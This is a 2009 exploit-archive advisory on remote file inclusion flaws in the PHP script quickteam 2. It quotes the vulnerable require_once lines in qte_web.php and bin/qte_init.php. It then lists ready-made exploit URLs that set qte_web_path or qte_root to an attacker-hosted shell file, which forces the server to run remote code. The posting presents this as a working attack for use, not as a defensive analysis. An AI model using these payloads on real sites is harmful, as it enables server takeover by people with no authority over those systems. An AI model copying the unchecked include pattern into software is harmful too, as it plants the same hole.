[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Qt quickteam Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-05-04
# Author : ahmadbady
# Previous Title : BluSky CMS (news_id) Remote SQL Injection Vulnerability
# Next Title : eLitius 1.0 Remote Command Execution Exploit


=-=-remote file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::quickteam 2
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.qt-cute.org/download/qte2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/qte_web.php
$qte_root = $qte_web_path;
require_once($qte_root.'bin/qte_init.php');
--
vul:/bin/qte_init.php
require_once($qte_root.'bin/config.php');
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/qte_web.php?qte_web_path=shell.txt?
path/bin/qte_init.php?qte_root=shell.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
dork: :d
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

# www.Syue.com [2009-05-04]